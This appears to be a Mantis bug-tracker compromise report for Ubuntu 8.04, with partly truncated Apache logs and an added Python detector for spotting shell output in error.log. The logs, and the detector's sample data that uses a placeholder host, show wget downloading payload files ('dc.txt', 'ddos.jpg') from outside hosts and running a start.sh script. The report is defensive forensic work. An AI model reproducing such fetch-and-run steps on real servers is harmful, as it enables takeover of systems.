mantis1.0.8-4 (ubuntu 8.04) vulnerable to remote exploit
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| mantis | Fix Released | Unknown | | |
| mantis (Ubuntu) | Fix Released | High | Unassigned | |
| Hardy | Fix Released | High | Unassigned | |
| Intrepid | Invalid | Undecided | Unassigned | |
Bug Description
Binary package hint: mantis
My system has been taken over.
It looks like it is a vulnerability already reported a year ago.
It seems like the following log lines indicate how a file got deployed in /tmp:
206.217.198.78 - - [09/Nov/
/mantis/
HTTP/1.0" 200 3336 "-" "-"
206.217.198.78 - - [09/Nov/
/mantis/
HTTP/1.0" 200 3295 "-" "-"
206.217.198.78 - - [09/Nov/
/mantis/
<code>
error.log
[Mon Nov 09 23:25:05 2009] [error] [client 206.183.9.211] File does not exist: /var/www/
--23:26:18-- http://
=> `dc.txt'
Resolving g0lias.
Connecting to g0lias.
HTTP request sent, awaiting response... 200 OK
Length: 759 [text/plain]
0K 100% 56.32 MB/s
23:26:19 (56.32 MB/s) - `dc.txt' saved [759/759]
[Mon Nov 09 23:42:55 2009] [error] [client 194.109.21.230] File does not exist: /var/www/
[Mon Nov 09 23:43:28 2009] [error] [client 193.109.122.17] request failed: error reading the headers
--00:05:46-- http://
=> `ddos.jpg'
Resolving lordmax.host.sk... 62.168.109.150
Connecting to lordmax.
HTTP request sent, awaiting response... 200 OK
Length: 204,429 (200K) [image/jpeg]
0K .......... .......... .......... .......... .......... 25% 1.06 MB/s
50K .......... .......... .......... .......... .......... 50% 3.02 MB/s
100K .......... .......... .......... .......... .......... 75% 3.29 MB/s
150K .......... .......... .......... .......... ......... 100% 3.39 MB/s
00:05:47 (2.13 MB/s) - `ddos.jpg' saved [204429/204429]
./start.sh: 1: /#bin/bash: not found
[Tue Nov 10 00:06:43 2009] [error] [client 194.109.21.230] File does not exist: /var/www/
[Tue Nov 10 00:08:06 2009] [error] [client 212.174.153.69] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.
[Tue Nov 10 00:09:19 2009] [error] [client 194.109.21.230] File does not exist: /var/www/
access.log
127.0.0.1 - - [09/Nov/
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2. (internal dummy connection)"
96.57.77.197 - - [09/Nov/
/w00tw00t.
206.183.9.211 - - [09/Nov/
/mantis/
HTTP/1.1" 200 5689
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
(Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.217.198.78 - - [09/Nov/
/mantis/
206.217.198.78 - - [09/Nov/
/mantis/
HTTP/1.0" 200 3336 "-" "-"
206.217.198.78 - - [09/Nov/
/mantis/
HTTP/1.0" 200 3295 "-" "-"
206.217.198.78 - - [09/Nov/
/mantis/
HTTP/1.0" 200 3302 "-" "-"
206.183.9.211 - - [09/Nov/
/mantis/
(Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
127.0.0.1 - - [09/Nov/
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2. (internal dummy connection)"
127.0.0.1 - - [09/Nov/
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2. (internal dummy connection)"
194.109.21.230 - - [09/Nov/
194.109.153.5:11111 HTTP/1.0" 302 348 "-" "-"
194.109.21.230 - - [09/Nov/
http://
"BOPM/3.1.3"
194.109.21.230 - - [09/Nov/
http://
193.109.122.38 - - [09/Nov/
72.51.18.254:6677 HTTP/1.0" 302 344 "-" "pxyscand/2.1"
193.109.122.17 - - [09/Nov/
http://
</code>
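The wget transcript and the `./start.sh ... not found` line in the error.log above are not Apache messages at all: commands spawned by the web server inherit its stderr, which is the error log, so their appearance there is direct evidence that the web application executed shell commands. The following is an added detection example (not code from the report or from the Mantis project) that scans error.log lines for such foreign output; the sample lines are constructed after the report, with `example.invalid` as a placeholder host.

```python
import re

# Constructed sample modelled on the error.log in the report; host is a placeholder.
SAMPLE_ERROR_LOG = """\
[Mon Nov 09 23:25:05 2009] [error] [client 206.183.9.211] File does not exist: /var/www/favicon.ico
--23:26:18--  http://example.invalid/dc.txt
           => `dc.txt'
Resolving example.invalid... 192.0.2.10
HTTP request sent, awaiting response... 200 OK
Length: 759 [text/plain]
23:26:19 (56.32 MB/s) - `dc.txt' saved [759/759]
--00:05:46--  http://example.invalid/ddos.jpg
           => `ddos.jpg'
00:05:47 (2.13 MB/s) - `ddos.jpg' saved [204429/204429]
./start.sh: 1: /#bin/bash: not found
[Tue Nov 10 00:08:06 2009] [error] [client 212.174.153.69] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /w00tw00t.
"""

# A genuine Apache 2.2 error.log entry starts with "[Day Mon DD HH:MM:SS YYYY] [level]".
APACHE_PREFIX = re.compile(r"^\[[A-Z][a-z]{2} [A-Z][a-z]{2} \d\d \d\d:\d\d:\d\d \d{4}\] \[\w+\]")
# wget (1.x) transcript markers: the fetch header and the final "saved" line.
WGET_START = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
WGET_SAVED = re.compile(r"`([^']+)' saved \[(\d+)/(\d+)\]")
# dash-style "script: line: command: not found" errors from a spawned shell.
SHELL_ERROR = re.compile(r"^\./\S+: \d+: .*not found$")


def find_command_output(lines):
    """Return (line_no, kind, detail) for lines that are not Apache-formatted
    and look like output of a shell or wget session run by the server process."""
    findings = []
    for n, line in enumerate(lines, 1):
        if APACHE_PREFIX.match(line):
            continue  # normal server message, leave it alone
        m = WGET_START.match(line)
        if m:
            findings.append((n, "wget_fetch", m.group(1)))
            continue
        m = WGET_SAVED.search(line)
        if m:
            findings.append((n, "file_saved", m.group(1)))
            continue
        if SHELL_ERROR.match(line):
            findings.append((n, "shell_error", line.strip()))
    return findings


def fetched_files(lines):
    """Names of files a wget run inside the server process completed writing."""
    return [d for _, kind, d in find_command_output(lines) if kind == "file_saved"]
```

Run it against a real error.log with `find_command_output(open(path).readlines())`; any `wget_fetch` or `shell_error` hit deserves a look at the matching access.log requests from the same minute.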
Changed in mantis (Ubuntu):
status: New → Triaged
importance: Undecided → High
visibility: private → public
Changed in mantis:
status: Unknown → Fix Released
I'll prepare the debdiff tonight.